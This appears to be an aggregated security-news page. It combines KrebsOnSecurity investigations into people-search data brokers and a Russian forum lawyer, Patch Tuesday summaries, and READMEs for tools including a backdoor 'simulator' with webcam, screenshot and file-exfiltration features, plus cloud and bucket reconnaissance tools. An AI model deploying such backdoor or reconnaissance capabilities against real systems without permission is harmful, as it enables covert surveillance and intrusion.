    However, there is an abundance of evidence suggesting Mr. Shelest is in fact the founder of Nuwber. Constella found that Minsk telephone number (375-292-702786) has been used multiple times in connection with the email address dmitrcox@gmail.com. Recall that Onerep.com’s domain registration records in 2018 list the email address dmitrcox2@gmail.com.

    It appears Mr. Shelest sought to reinvent his online identity in 2015 by adding a “2” to his email address. The Belarus phone number tied to Nuwber.com shows up in the domain records for comversus.com, and DomainTools says this domain is tied to both dmitrcox@gmail.com and dmitrcox2@gmail.com. Other domains that mention both email addresses in their WHOIS records include careon.me, docvsdoc.com, dotcomsvdot.com, namevname.com, okanyway.com and tapanyapp.com.

    Onerep.com CEO and founder Dimitri Shelest, as pictured on the “about” page of onerep.com.

    A search in DomainTools for the email address dmitrcox@gmail.com shows it is associated with the registration of at least 179 domain names, including dozens of mostly now-defunct people-search companies targeting citizens of Argentina, Brazil, Canada, Denmark, France, Germany, Hong Kong, Israel, Italy, Japan, Latvia and Mexico, among others.

    Those include nuwber.fr, a site registered in 2016 which was identical to the homepage of Nuwber.com at the time. DomainTools shows the same email and Belarus phone number are in historic registration records for nuwber.at, nuwber.ch, and nuwber.dk (all domains linked here are to their cached copies at archive.org, where available).

    Nuwber.com, circa 2015. Image: Archive.org.

    Update, March 21, 11:15 a.m. ET: Mr. Shelest has provided a lengthy response to the findings in this story. In summary, Shelest acknowledged maintaining an ownership stake in Nuwber, but said there was “zero cross-over or information-sharing with OneRep.” Mr. Shelest said any other old domains that may be found and associated with his name are no longer being operated by him.

    “I get it,” Shelest wrote. “My affiliation with a people search business may look odd from the outside. In truth, if I hadn’t taken that initial path with a deep dive into how people search sites work, Onerep wouldn’t have the best tech and team in the space. Still, I now appreciate that we did not make this more clear in the past and I’m aiming to do better in the future.” The full statement is available here (PDF).

    Original story:

    Historic WHOIS records for onerep.com show it was registered for many years to a resident of Sioux Falls, SD for a completely unrelated site. But around Sept. 2015 the domain switched from the registrar GoDaddy.com to eNom, and the registration records were hidden behind privacy protection services. DomainTools indicates around this time onerep.com started using domain name servers from DNS provider constellix.com. Likewise, Nuwber.com first appeared in late 2015, was also registered through eNom, and also started using constellix.com for DNS at nearly the same time.

    Listed on LinkedIn as a former product manager at OneRep.com between 2015 and 2018 is Dimitri Bukuyazau, who says their hometown is Warsaw, Poland. While this LinkedIn profile (linkedin.com/in/dzmitrybukuyazau) does not mention Nuwber, a search on this name in Google turns up a 2017 blog post from privacyduck.com, which laid out a number of reasons to support a conclusion that OneRep and Nuwber.com were the same company.

    “Any people search profiles containing your Personally Identifiable Information that were on Nuwber.com were also mirrored identically on OneRep.com, down to the relatives’ names and address histories,” Privacyduck.com wrote. The post continued:

    “Both sites offered the same immediate opt-out process. Both sites had the same generic contact and support structure. They were – and remain – the same company (even PissedConsumer.com advocates this fact: https://nuwber.pissedconsumer.com/nuwber-and-onerep-20160707878520.html).”

    “Things changed in early 2016 when OneRep.com began offering privacy removal services right alongside their own open displays of your personal information. At this point when you found yourself on Nuwber.com OR OneRep.com, you would be provided with the option of opting-out your data on their site for free – but also be highly encouraged to pay them to remove it from a slew of other sites (and part of that payment was removing you from their own site, Nuwber.com, as a benefit of their service).”

    Reached via LinkedIn, Mr. Bukuyazau declined to answer questions, such as whether he ever worked at Nuwber.com. However, Constella Intelligence finds two interesting email addresses for employees at nuwber.com: d.bu@nuwber.com, and d.bu+figure-eight.com@nuwber.com, which was registered under the name “Dzmitry.”

    PrivacyDuck’s claims about how onerep.com appeared and behaved in the early days are not readily verifiable because the domain onerep.com has been completely excluded from the Wayback Machine at archive.org. The Wayback Machine will honor such requests if they come directly from the owner of the domain in question.

    Still, Mr. Shelest’s name, phone number and email also appear in the domain registration records for a truly dizzying number of country-specific people-search services, including pplcrwlr.in, pplcrwlr.fr, pplcrwlr.dk, pplcrwlr.jp, peeepl.br.com, peeepl.in, peeepl.it and peeepl.co.uk.

    The same details appear in the WHOIS registration records for the now-defunct people-search sites waatpp.de, waatp1.fr, azersab.com, and ahavoila.com, a people-search service for French citizens.

    The German people-search site waatp.de.

    A search on the email address dmitrcox@gmail.com suggests Mr. Shelest was previously involved in rather aggressive email marketing campaigns. In 2010, an anonymous source leaked to KrebsOnSecurity the financial and organizational records of Spamit, which at the time was easily the largest Russian-language pharmacy spam affiliate program in the world.

    Spamit paid spammers a hefty commission every time someone bought male enhancement drugs from any of their spam-advertised websites. Mr. Shelest’s email address stood out because immediately after the Spamit database was leaked, KrebsOnSecurity searched all of the Spamit affiliate email addresses to determine if any of them corresponded to social media accounts at Facebook.com (at the time, Facebook allowed users to search profiles by email address).

    That mapping, which was done mainly by generous graduate students at my alma mater George Mason University, revealed that dmitrcox@gmail.com was used by a Spamit affiliate, albeit not a very profitable one. That same Facebook profile for Mr. Shelest is still active, and it says he is married and living in Minsk [Update, Mar. 16: Mr. Shelest’s Facebook account is no longer active].

    The Italian people-search website peeepl.it.

    Scrolling down Mr. Shelest’s Facebook page to posts made more than ten years ago show him liking the Facebook profile pages for a large number of other people-search sites, including findita.com, findmedo.com, folkscan.com, huntize.com, ifindy.com, jupery.com, look2man.com, lookerun.com, manyp.com, peepull.com, perserch.com, persuer.com, pervent.com, piplenter.com, piplfind.com, piplscan.com, popopke.com, pplsorce.com, qimeo.com, scoutu2.com, search64.com, searchay.com, seekmi.com, selfabc.com, socsee.com, srching.com, toolooks.com, upearch.com, webmeek.com, and many country-code variations of viadin.ca (e.g. viadin.hk, viadin.com and viadin.de).

    The people-search website popopke.com.

    Domaintools.com finds that all of the domains mentioned in the last paragraph were registered to the email address dmitrcox@gmail.com.

    Mr. Shelest has not responded to multiple requests for comment. KrebsOnSecurity also sought comment from onerep.com, which likewise has not responded to inquiries about its founder’s many apparent conflicts of interest. In any event, these practices would seem to contradict the goal Onerep has stated on its site: “We believe that no one should compromise personal online security and get a profit from it.”

    The people-search website findmedo.com.

    Max Anderson is chief growth officer at 360 Privacy, a legitimate privacy company that works to keep its clients’ data off of more than 400 data broker and people-search sites. Anderson said it is concerning to see a direct link between between a data removal service and data broker websites.

    “I would consider it unethical to run a company that sells people’s information, and then charge those same people to have their information removed,” Anderson said.

    Last week, KrebsOnSecurity published an analysis of the people-search data broker giant Radaris, whose consumer profiles are deep enough to rival those of far more guarded data broker resources available to U.S. police departments and other law enforcement personnel.

    That story revealed that the co-founders of Radaris are two native Russian brothers who operate multiple Russian-language dating services and affiliate programs. It also appears many of the Radaris founders’ businesses have ties to a California marketing firm that works with a Russian state-run media conglomerate currently sanctioned by the U.S. government.

    KrebsOnSecurity will continue investigating the history of various consumer data brokers and people-search providers. If any readers have inside knowledge of this industry or key players within it, please consider reaching out to krebsonsecurity at gmail.com.

    Update, March 15, 11:35 a.m. ET: Many readers have pointed out something that was somehow overlooked amid all this research: The Mozilla Foundation, the company that runs the Firefox Web browser, has launched a data removal service called Mozilla Monitor that bundles OneRep. That notice says Mozilla Monitor is offered as a free or paid subscription service.

    “The free data breach notification service is a partnership with Have I Been Pwned (“HIBP”),” the Mozilla Foundation explains. “The automated data deletion service is a partnership with OneRep to remove personal information published on publicly available online directories and other aggregators of information about individuals (“Data Broker Sites”).”

    In a statement shared with KrebsOnSecurity.com, Mozilla said they did assess OneRep’s data removal service to confirm it acts according to privacy principles advocated at Mozilla.

    “We were aware of the past affiliations with the entities named in the article and were assured they had ended prior to our work together,” the statement reads. “We’re now looking into this further. We will always put the privacy and security of our customers first and will provide updates as needed.”

    Patch Tuesday, March 2024 Edition

    Apple and Microsoft recently released software updates to fix dozens of security holes in their operating systems. Microsoft today patched at least 60 vulnerabilities in its Windows OS. Meanwhile, Apple’s new macOS Sonoma addresses at least 68 security weaknesses, and its latest update for iOS fixes two zero-day flaws.

    Last week, Apple pushed out an urgent software update to its flagship iOS platform, warning that there were at least two zero-day exploits for vulnerabilities being used in the wild (CVE-2024-23225 and CVE-2024-23296). The security updates are available in iOS 17.4, iPadOS 17.4, and iOS 16.7.6.

    Apple’s macOS Sonoma 14.4 Security Update addresses dozens of security issues. Jason Kitka, chief information security officer at Automox, said the vulnerabilities patched in this update often stem from memory safety issues, a concern that has led to a broader industry conversation about the adoption of memory-safe programming languages [full disclosure: Automox is an advertiser on this site].

    On Feb. 26, 2024, the Biden administration issued a report that calls for greater adoption of memory-safe programming languages. On Mar. 4, 2024, Google published Secure by Design, which lays out the company’s perspective on memory safety risks.

    Mercifully, there do not appear to be any zero-day threats hounding Windows users this month (at least not yet). Satnam Narang, senior staff research engineer at Tenable, notes that of the 60 CVEs in this month’s Patch Tuesday release, only six are considered “more likely to be exploited” according to Microsoft.

    Those more likely to be exploited bugs are mostly “elevation of privilege vulnerabilities” including CVE-2024-26182 (Windows Kernel), CVE-2024-26170 (Windows Composite Image File System (CimFS), CVE-2024-21437 (Windows Graphics Component), and CVE-2024-21433 (Windows Print Spooler).

    Narang highlighted CVE-2024-21390 as a particularly interesting vulnerability in this month’s Patch Tuesday release, which is an elevation of privilege flaw in Microsoft Authenticator, the software giant’s app for multi-factor authentication. Narang said a prerequisite for an attacker to exploit this flaw is to already have a presence on the device either through malware or a malicious application.

    “If a victim has closed and re-opened the Microsoft Authenticator app, an attacker could obtain multi-factor authentication codes and modify or delete accounts from the app,” Narang said. “Having access to a target device is bad enough as they can monitor keystrokes, steal data and redirect users to phishing websites, but if the goal is to remain stealth, they could maintain this access and steal multi-factor authentication codes in order to login to sensitive accounts, steal data or hijack the accounts altogether by changing passwords and replacing the multi-factor authentication device, effectively locking the user out of their accounts.”

    CVE-2024-21334 earned a CVSS (danger) score of 9.8 (10 is the worst), and it concerns a weakness in Open Management Infrastructure (OMI), a Linux-based cloud infrastructure in Microsoft Azure. Microsoft says attackers could connect to OMI instances over the Internet without authentication, and then send specially crafted data packets to gain remote code execution on the host device.

    CVE-2024-21435 is a CVSS 8.8 vulnerability in Windows OLE, which acts as a kind of backbone for a great deal of communication between applications that people use every day on Windows, said Ben McCarthy, lead cybersecurity engineer at Immersive Labs.

    “With this vulnerability, there is an exploit that allows remote code execution, the attacker needs to trick a user into opening a document, this document will exploit the OLE engine to download a malicious DLL to gain code execution on the system,” Breen explained. “The attack complexity has been described as low meaning there is less of a barrier to entry for attackers.”

    A full list of the vulnerabilities addressed by Microsoft this month is available at the SANS Internet Storm Center, which breaks down the updates by severity and urgency.

    Finally, Adobe today issued security updates that fix dozens of security holes in a wide range of products, including Adobe Experience Manager, Adobe Premiere Pro, ColdFusion 2023 and 2021, Adobe Bridge, Lightroom, and Adobe Animate. Adobe said it is not aware of active exploitation against any of the flaws.

    By the way, Adobe recently enrolled all of its Acrobat users into a “new generative AI feature” that scans the contents of your PDFs so that its new “AI Assistant” can  “understand your questions and provide responses based on the content of your PDF file.” Adobe provides instructions on how to disable the AI features and opt out here.

    BackDoorSim - An Educational Into Remote Administration Tools

    By: Zion3R


    BackdoorSim is a remote administration and monitoring tool designed for educational and testing purposes. It consists of two main components: ControlServer and BackdoorClient. The server controls the client, allowing for various operations like file transfer, system monitoring, and more.


    Disclaimer

    This tool is intended for educational purposes only. Misuse of this software can violate privacy and security policies. The developers are not responsible for any misuse or damage caused by this software. Always ensure you have permission to use this tool in your intended environment.


    Features
    • File Transfer: Upload and download files between server and client.
    • Screenshot Capture: Take screenshots from the client's system.
    • System Information Gathering: Retrieve detailed system and security software information.
    • Camera Access: Capture images from the client's webcam.
    • Notifications: Send and display notifications on the client system.
    • Help Menu: Easy access to command information and usage.

    Installation

    To set up BackdoorSim, you will need to install it on both the server and client machines.

    1. Clone the repository:

    shell $ git clone https://github.com/HalilDeniz/BackDoorSim.git

    1. Navigate to the project directory:

    shell $ cd BackDoorSim

    1. Install the required dependencies:

    shell $ pip install -r requirements.txt


    Usage

    After starting both the server and client, you can use the following commands in the server's command prompt:

    • upload [file_path]: Upload a file to the client.
    • download [file_path]: Download a file from the client.
    • screenshot: Capture a screenshot from the client.
    • sysinfo: Get system information from the client.
    • securityinfo: Get security software status from the client.
    • camshot: Capture an image from the client's webcam.
    • notify [title] [message]: Send a notification to the client.
    • help: Display the help menu.

    Disclaimer

    BackDoorSim is developed for educational purposes only. The creators of BackDoorSim are not responsible for any misuse of this tool. This tool should not be used in any unauthorized or illegal manner. Always ensure ethical and legal use of this tool.


    DepNot: RansomwareSim

    If you are interested in tools like BackdoorSim, be sure to check out my recently released RansomwareSim tool


    BackdoorSim: An Educational into Remote Administration Tools

    If you want to read our article about Backdoor


    Contributing

    Contributions, suggestions, and feedback are welcome. Please create an issue or pull request for any contributions. 1. Fork the repository. 2. Create a new branch for your feature or bug fix. 3. Make your changes and commit them. 4. Push your changes to your forked repository. 5. Open a pull request in the main repository.


    Contact

    For any inquiries or further information, you can reach me through the following channels:



    AzSubEnum - Azure Service Subdomain Enumeration

    By: Zion3R


    AzSubEnum is a specialized subdomain enumeration tool tailored for Azure services. This tool is designed to meticulously search and identify subdomains associated with various Azure services. Through a combination of techniques and queries, AzSubEnum delves into the Azure domain structure, systematically probing and collecting subdomains related to a diverse range of Azure services.


    How it works?

    AzSubEnum operates by leveraging DNS resolution techniques and systematic permutation methods to unveil subdomains associated with Azure services such as Azure App Services, Storage Accounts, Azure Databases (including MSSQL, Cosmos DB, and Redis), Key Vaults, CDN, Email, SharePoint, Azure Container Registry, and more. Its functionality extends to comprehensively scanning different Azure service domains to identify associated subdomains.

    With this tool, users can conduct thorough subdomain enumeration within Azure environments, aiding security professionals, researchers, and administrators in gaining insights into the expansive landscape of Azure services and their corresponding subdomains.


    Why i create this?

    During my learning journey on Azure AD exploitation, I discovered that the Azure subdomain tool, Invoke-EnumerateAzureSubDomains from NetSPI, was unable to run on my Debian PowerShell. Consequently, I created a crude implementation of that tool in Python.


    Usage
    ➜  AzSubEnum git:(main) ✗ python3 azsubenum.py --help
    usage: azsubenum.py [-h] -b BASE [-v] [-t THREADS] [-p PERMUTATIONS]

    Azure Subdomain Enumeration

    options:
    -h, --help show this help message and exit
    -b BASE, --base BASE Base name to use
    -v, --verbose Show verbose output
    -t THREADS, --threads THREADS
    Number of threads for concurrent execution
    -p PERMUTATIONS, --permutations PERMUTATIONS
    File containing permutations

    Basic enumeration:

    python3 azsubenum.py -b retailcorp --thread 10

    Using permutation wordlists:

    python3 azsubenum.py -b retailcorp --thread 10 --permutation permutations.txt

    With verbose output:

    python3 azsubenum.py -b retailcorp --thread 10 --permutation permutations.txt --verbose




    MrHandler - Linux Incident Response Reporting

    By: Zion3R

     


    MR.Handler is a specialized tool designed for responding to security incidents on Linux systems. It connects to target systems via SSH to execute a range of diagnostic commands, gathering crucial information such as network configurations, system logs, user accounts, and running processes. At the end of its operation, the tool compiles all the gathered data into a comprehensive HTML report. This report details both the specifics of the incident response process and the current state of the system, enabling security analysts to more effectively assess and respond to incidents.



    𝗜𝗡𝗦𝗧𝗔𝗟𝗟𝗔𝗧𝗜𝗢𝗡 𝗜𝗡𝗦𝗧𝗥𝗨𝗖𝗧𝗜𝗢𝗡𝗦
      $ pip3 install colorama
    $ pip3 install paramiko
    $ git clone https://github.com/emrekybs/BlueFish.git
    $ cd MrHandler
    $ chmod +x MrHandler.py
    $ python3 MrHandler.py


    Report



    WEB-Wordlist-Generator - Creates Related Wordlists After Scanning Your Web Applications

    By: Zion3R


    WEB-Wordlist-Generator scans your web applications and creates related wordlists to take preliminary countermeasures against cyber attacks.


    Done
    • [x] Scan Static Files.
    • [ ] Scan Metadata Of Public Documents (pdf,doc,xls,ppt,docx,pptx,xlsx etc.)
    • [ ] Create a New Associated Wordlist with the Wordlist Given as a Parameter.

    Installation

    From Git
    git clone https://github.com/OsmanKandemir/web-wordlist-generator.git
    cd web-wordlist-generator && pip3 install -r requirements.txt
    python3 generator.py -d target-web.com

    From Dockerfile

    You can run this application on a container after build a Dockerfile.

    docker build -t webwordlistgenerator .
    docker run webwordlistgenerator -d target-web.com -o

    From DockerHub

    You can run this application on a container after pulling from DockerHub.

    docker pull osmankandemir/webwordlistgenerator:v1.0
    docker run osmankandemir/webwordlistgenerator:v1.0 -d target-web.com -o

    Usage
    -d DOMAINS [DOMAINS], --domains DOMAINS [DOMAINS] Input Multi or Single Targets. --domains target-web1.com target-web2.com
    -p PROXY, --proxy PROXY Use HTTP proxy. --proxy 0.0.0.0:8080
    -a AGENT, --agent AGENT Use agent. --agent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)'
    -o PRINT, --print PRINT Use Print outputs on terminal screen.



    Fat Patch Tuesday, February 2024 Edition

    Microsoft Corp. today pushed software updates to plug more than 70 security holes in its Windows operating systems and related products, including two zero-day vulnerabilities that are already being exploited in active attacks.

    Top of the heap on this Fat Patch Tuesday is CVE-2024-21412, a “security feature bypass” in the way Windows handles Internet Shortcut Files that Microsoft says is being targeted in active exploits. Redmond’s advisory for this bug says an attacker would need to convince or trick a user into opening a malicious shortcut file.

    Researchers at Trend Micro have tied the ongoing exploitation of CVE-2024-21412 to an advanced persistent threat group dubbed “Water Hydra,” which they say has being using the vulnerability to execute a malicious Microsoft Installer File (.msi) that in turn unloads a remote access trojan (RAT) onto infected Windows systems.

    The other zero-day flaw is CVE-2024-21351, another security feature bypass — this one in the built-in Windows SmartScreen component that tries to screen out potentially malicious files downloaded from the Web. Kevin Breen at Immersive Labs says it’s important to note that this vulnerability alone is not enough for an attacker to compromise a user’s workstation, and instead would likely be used in conjunction with something like a spear phishing attack that delivers a malicious file.

    Satnam Narang, senior staff research engineer at Tenable, said this is the fifth vulnerability in Windows SmartScreen patched since 2022 and all five have been exploited in the wild as zero-days. They include CVE-2022-44698 in December 2022, CVE-2023-24880 in March 2023, CVE-2023-32049 in July 2023 and CVE-2023-36025 in November 2023.

    Narang called special attention to CVE-2024-21410, an “elevation of privilege” bug in Microsoft Exchange Server that Microsoft says is likely to be exploited by attackers. Attacks on this flaw would lead to the disclosure of NTLM hashes, which could be leveraged as part of an NTLM relay or “pass the hash” attack, which lets an attacker masquerade as a legitimate user without ever having to log in.

    “We know that flaws that can disclose sensitive information like NTLM hashes are very valuable to attackers,” Narang said. “A Russian-based threat actor leveraged a similar vulnerability to carry out attacks – CVE-2023-23397 is an Elevation of Privilege vulnerability in Microsoft Outlook patched in March 2023.”

    Microsoft notes that prior to its Exchange Server 2019 Cumulative Update 14 (CU14), a security feature called Extended Protection for Authentication (EPA), which provides NTLM credential relay protections, was not enabled by default.

    “Going forward, CU14 enables this by default on Exchange servers, which is why it is important to upgrade,” Narang said.

    Rapid7’s lead software engineer Adam Barnett highlighted CVE-2024-21413, a critical remote code execution bug in Microsoft Office that could be exploited just by viewing a specially-crafted message in the Outlook Preview pane.

    “Microsoft Office typically shields users from a variety of attacks by opening files with Mark of the Web in Protected View, which means Office will render the document without fetching potentially malicious external resources,” Barnett said. “CVE-2024-21413 is a critical RCE vulnerability in Office which allows an attacker to cause a file to open in editing mode as though the user had agreed to trust the file.”

    Barnett stressed that administrators responsible for Office 2016 installations who apply patches outside of Microsoft Update should note the advisory lists no fewer than five separate patches which must be installed to achieve remediation of CVE-2024-21413; individual update knowledge base (KB) articles further note that partially-patched Office installations will be blocked from starting until the correct combination of patches has been installed.

    It’s a good idea for Windows end-users to stay current with security updates from Microsoft, which can quickly pile up otherwise. That doesn’t mean you have to install them on Patch Tuesday. Indeed, waiting a day or three before updating is a sane response, given that sometimes updates go awry and usually within a few days Microsoft has fixed any issues with its patches. It’s also smart to back up your data and/or image your Windows drive before applying new updates.

    For a more detailed breakdown of the individual flaws addressed by Microsoft today, check out the SANS Internet Storm Center’s list. For those admins responsible for maintaining larger Windows environments, it often pays to keep an eye on Askwoody.com, which frequently points out when specific Microsoft updates are creating problems for a number of users.

    From Cybercrime Saul Goodman to the Russian GRU

    In 2021, the exclusive Russian cybercrime forum Mazafaka was hacked. The leaked user database shows one of the forum’s founders was an attorney who advised Russia’s top hackers on the legal risks of their work, and what to do if they got caught. A review of this user’s hacker identities shows that during his time on the forums he served as an officer in the special forces of the GRU, the foreign military intelligence agency of the Russian Federation.

    Launched in 2001 under the tagline “Network terrorism,” Mazafaka would evolve into one of the most guarded Russian-language cybercrime communities. The forum’s member roster included a Who’s Who of top Russian cybercriminals, and it featured sub-forums for a wide range of cybercrime specialities, including malware, spam, coding and identity theft.

    One representation of the leaked Mazafaka database.

    In almost any database leak, the first accounts listed are usually the administrators and early core members. But the Mazafaka user information posted online was not a database file per se, and it was clearly edited, redacted and restructured by whoever released it. As a result, it can be difficult to tell which members are the earliest users.

    The original Mazafaka is known to have been launched by a hacker using the nickname “Stalker.” However, the lowest numbered (non-admin) user ID in the Mazafaka database belongs to another individual who used the handle “Djamix,” and the email address djamix@mazafaka[.]ru.

    From the forum’s inception until around 2008, Djamix was one of its most active and eloquent contributors. Djamix told forum members he was a lawyer, and nearly all of his posts included legal analyses of various public cases involving hackers arrested and charged with cybercrimes in Russia and abroad.

    “Hiding with purely technical parameters will not help in a serious matter,” Djamix advised Maza members in September 2007. “In order to ESCAPE the law, you need to KNOW the law. This is the most important thing. Technical capabilities cannot overcome intelligence and cunning.”

    Stalker himself credited Djamix with keeping Mazafaka online for so many years. In a retrospective post published to Livejournal in 2014 titled, “Mazafaka, from conception to the present day,” Stalker said Djamix had become a core member of the community.

    “This guy is everywhere,” Stalker said of Djamix. “There’s not a thing on [Mazafaka] that he doesn’t take part in. For me, he is a stimulus-irritant and thanks to him, Maza is still alive. Our rallying force!”

    Djamix told other forum denizens he was a licensed attorney who could be hired for remote or in-person consultations, and his posts on Mazafaka and other Russian boards show several hackers facing legal jeopardy likely took him up on this offer.

    “I have the right to represent your interests in court,” Djamix said on the Russian-language cybercrime forum Verified in Jan. 2011. “Remotely (in the form of constant support and consultations), or in person – this is discussed separately. As well as the cost of my services.”

    WHO IS DJAMIX?

    A search on djamix@mazafaka[.]ru at DomainTools.com reveals this address has been used to register at least 10 domain names since 2008. Those include several websites about life in and around Sochi, Russia, the site of the 2014 Winter Olympics, as well as a nearby coastal town called Adler. All of those sites say they were registered to an Aleksei Safronov from Sochi who also lists Adler as a hometown.

    The breach tracking service Constella Intelligence finds that the phone number associated with those domains — +7.9676442212 — is tied to a Facebook account for an Aleksei Valerievich Safronov from Sochi. Mr. Safronov’s Facebook profile, which was last updated in October 2022, says his ICQ instant messenger number is 53765. This is the same ICQ number assigned to Djamix in the Mazafaka user database.

    The Facebook account for Aleksey Safronov.

    A “Djamix” account on the forum privetsochi[.]ru (“Hello Sochi”) says this user was born Oct. 2, 1970, and that his website is uposter[.]ru. This Russian language news site’s tagline is, “We Create Communication,” and it focuses heavily on news about Sochi, Adler, Russia and the war in Ukraine, with a strong pro-Kremlin bent.

    Safronov’s Facebook profile also gives his Skype username as “Djamixadler,” and it includes dozens of photos of him dressed in military fatigues along with a regiment of soldiers deploying in fairly remote areas of Russia. Some of those photos date back to 2008.

    In several of the images, we can see a patch on the arm of Safronov’s jacket that bears the logo of the Spetsnaz GRU, a special forces unit of the Russian military. According to a 2020 report from the Congressional Research Service, the GRU operates both as an intelligence agency — collecting human, cyber, and signals intelligence — and as a military organization responsible for battlefield reconnaissance and the operation of Russia’s Spetsnaz military commando units.

    Mr. Safronov posted this image of himself on Facebook in 2016. The insignia of the GRU can be seen on his sleeve.

    “In recent years, reports have linked the GRU to some of Russia’s most aggressive and public intelligence operations,” the CRS report explains. “Reportedly, the GRU played a key role in Russia’s occupation of Ukraine’s Crimea region and invasion of eastern Ukraine, the attempted assassination of former Russian intelligence officer Sergei Skripal in the United Kingdom, interference in the 2016 U.S. presidential elections, disinformation and propaganda operations, and some of the world’s most damaging cyberattacks.”

    According to the Russia-focused investigative news outlet Meduza, in 2014 the Russian Defense Ministry created its “information-operation troops” for action in “cyber-confrontations with potential adversaries.”

    “Later, sources in the Defense Ministry explained that these new troops were meant to ‘disrupt the potential adversary’s information networks,'” Meduza reported in 2018. “Recruiters reportedly went looking for ‘hackers who have had problems with the law.'”

    Mr. Safronov did not respond to multiple requests for comment. A 2018 treatise written by Aleksei Valerievich Safronov titled “One Hundred Years of GRU Military Intelligence” explains the significance of the bat in the seal of the GRU.

    “One way or another, the bat is an emblem that unites all active and retired intelligence officers; it is a symbol of unity and exclusivity,” Safronov wrote. “And, in general, it doesn’t matter who we’re talking about – a secret GRU agent somewhere in the army or a sniper in any of the special forces brigades. They all did and are doing one very important and responsible thing.”

    It’s unclear what role Mr. Safronov plays or played in the GRU, but it seems likely the military intelligence agency would have exploited his considerable technical skills, knowledge and connections on the Russian cybercrime forums.

    Searching on Safronov’s domain uposter[.]ru in Constella Intelligence reveals that this domain was used in 2022 to register an account at a popular Spanish-language discussion forum dedicated to helping applicants prepare for a career in the Guardia Civil, one of Spain’s two national police forces. Pivoting on that Russian IP in Constella shows three other accounts were created at the same Spanish user forum around the same date.

    Mark Rasch is a former cybercrime prosecutor for the U.S. Department of Justice who now serves as chief legal officer for the New York cybersecurity firm Unit 221B. Rasch said there has always been a close relationship between the GRU and the Russian hacker community, noting that in the early 2000s the GRU was soliciting hackers with the skills necessary to hack US banks in order to procure funds to help finance Russia’s war in Chechnya.

    “The guy is heavily hooked into the Russian cyber community, and that’s useful for intelligence services,” Rasch said. “He could have been infiltrating the community to monitor it for the GRU. Or he could just be a guy wearing a military uniform.”

    U.S. Imposes Visa Restrictions on those Involved in Illegal Spyware Surveillance

    The U.S. State Department said it's implementing a new policy that imposes visa restrictions on individuals who are linked to the illegal use of commercial spyware to surveil civil society members. "The&nbsp;misuse of commercial spyware&nbsp;threatens privacy and freedoms of expression, peaceful assembly, and association," Secretary of State Antony Blinken&nbsp;said. "Such targeting has been

    BucketLoot - An Automated S3-compatible Bucket Inspector

    By: Zion3R


    BucketLoot is an automated S3-compatible Bucket inspector that can help users extract assets, flag secret exposures and even search for custom keywords as well as Regular Expressions from publicly-exposed storage buckets by scanning files that store data in plain-text.

    The tool can scan for buckets deployed on Amazon Web Services (AWS), Google Cloud Storage (GCS), DigitalOcean Spaces and even custom domains/URLs which could be connected to these platforms. It returns the output in a JSON format, thus enabling users to parse it according to their liking or forward it to any other tool for further processing.

    BucketLoot comes with a guest mode by default, which means a user doesn't needs to specify any API tokens / Access Keys initially in order to run the scan. The tool will scrape a maximum of 1000 files that are returned in the XML response and if the storage bucket contains more than 1000 entries which the user would like to run the scanner on, they can provide platform credentials to run a complete scan. If you'd like to know more about the tool, make sure to check out our blog.

    Features

    Secret Scanning

    Scans for over 80+ unique RegEx signatures that can help in uncovering secret exposures tagged with their severity from the misconfigured storage bucket. Users have the ability to modify or add their own signatures in the regexes.json file. If you believe you have any cool signatures which might be helpful for others too and could be flagged at scale, go ahead and make a PR!

    Sensitive File Checks

    Accidental sensitive file leakages are a big problem that affects the security posture of individuals and organisations. BucketLoot comes with a 80+ unique regEx signatures list in vulnFiles.json which allows users to flag these sensitive files based on file names or extensions.

    Dig Mode

    Want to quickly check if any target website is using a misconfigured bucket that is leaking secrets or any other sensitive data? Dig Mode allows you to pass non-S3 targets and let the tool scrape URLs from response body for scanning.

    Asset Extraction

    Interested in stepping up your asset discovery game? BucketLoot extracts all the URLs/Subdomains and Domains that could be present in an exposed storage bucket, enabling you to have a chance of discovering hidden endpoints, thus giving you an edge over the other traditional recon tools.

    Searching

    The tool goes beyond just asset discovery and secret exposure scanning by letting users search for custom keywords and even Regular Expression queries which may help them find exactly what they are looking for.

    To know more about our Attack Surface Management platform, check out NVADR.



    Raven - CI/CD Security Analyzer

    By: Zion3R


    RAVEN (Risk Analysis and Vulnerability Enumeration for CI/CD) is a powerful security tool designed to perform massive scans for GitHub Actions CI workflows and digest the discovered data into a Neo4j database. Developed and maintained by the Cycode research team.

    With Raven, we were able to identify and report security vulnerabilities in some of the most popular repositories hosted on GitHub, including:

    We listed all vulnerabilities discovered using Raven in the tool Hall of Fame.


    What is Raven

    The tool provides the following capabilities to scan and analyze potential CI/CD vulnerabilities:

    • Downloader: You can download workflows and actions necessary for analysis. Workflows can be downloaded for a specified organization or for all repositories, sorted by star count. Performing this step is a prerequisite for analyzing the workflows.
    • Indexer: Digesting the downloaded data into a graph-based Neo4j database. This process involves establishing relationships between workflows, actions, jobs, steps, etc.
    • Query Library: We created a library of pre-defined queries based on research conducted by the community.
    • Reporter: Raven has a simple way of reporting suspicious findings. As an example, it can be incorporated into the CI process for pull requests and run there.

    Possible usages for Raven:

    • Scanner for your own organization's security
    • Scanning specified organizations for bug bounty purposes
    • Scan everything and report issues found to save the internet
    • Research and learning purposes

    This tool provides a reliable and scalable solution for CI/CD security analysis, enabling users to query bad configurations and gain valuable insights into their codebase's security posture.

    Why Raven

    In the past year, Cycode Labs conducted extensive research on fundamental security issues of CI/CD systems. We examined the depths of many systems, thousands of projects, and several configurations. The conclusion is clear – the model in which security is delegated to developers has failed. This has been proven several times in our previous content:

    • A simple injection scenario exposed dozens of public repositories, including popular open-source projects.
    • We found that one of the most popular frontend frameworks was vulnerable to the innovative method of branch injection attack.
    • We detailed a completely different attack vector, 3rd party integration risks, the most popular project on GitHub, and thousands more.
    • Finally, the Microsoft 365 UI framework, with more than 300 million users, is vulnerable to an additional new threat – an artifact poisoning attack.
    • Additionally, we found, reported, and disclosed hundreds of other vulnerabilities privately.

    Each of the vulnerabilities above has unique characteristics, making it nearly impossible for developers to stay up to date with the latest security trends. Unfortunately, each vulnerability shares a commonality – each exploitation can impact millions of victims.

    It was for these reasons that Raven was created, a framework for CI/CD security analysis workflows (and GitHub Actions as the first use case). In our focus, we examined complex scenarios where each issue isn't a threat on its own, but when combined, they pose a severe threat.

    Setup && Run

    To get started with Raven, follow these installation instructions:

    Step 1: Install the Raven package

    pip3 install raven-cycode

    Step 2: Setup a local Redis server and Neo4j database

    docker run -d --name raven-neo4j -p7474:7474 -p7687:7687 --env NEO4J_AUTH=neo4j/123456789 --volume raven-neo4j:/data neo4j:5.12
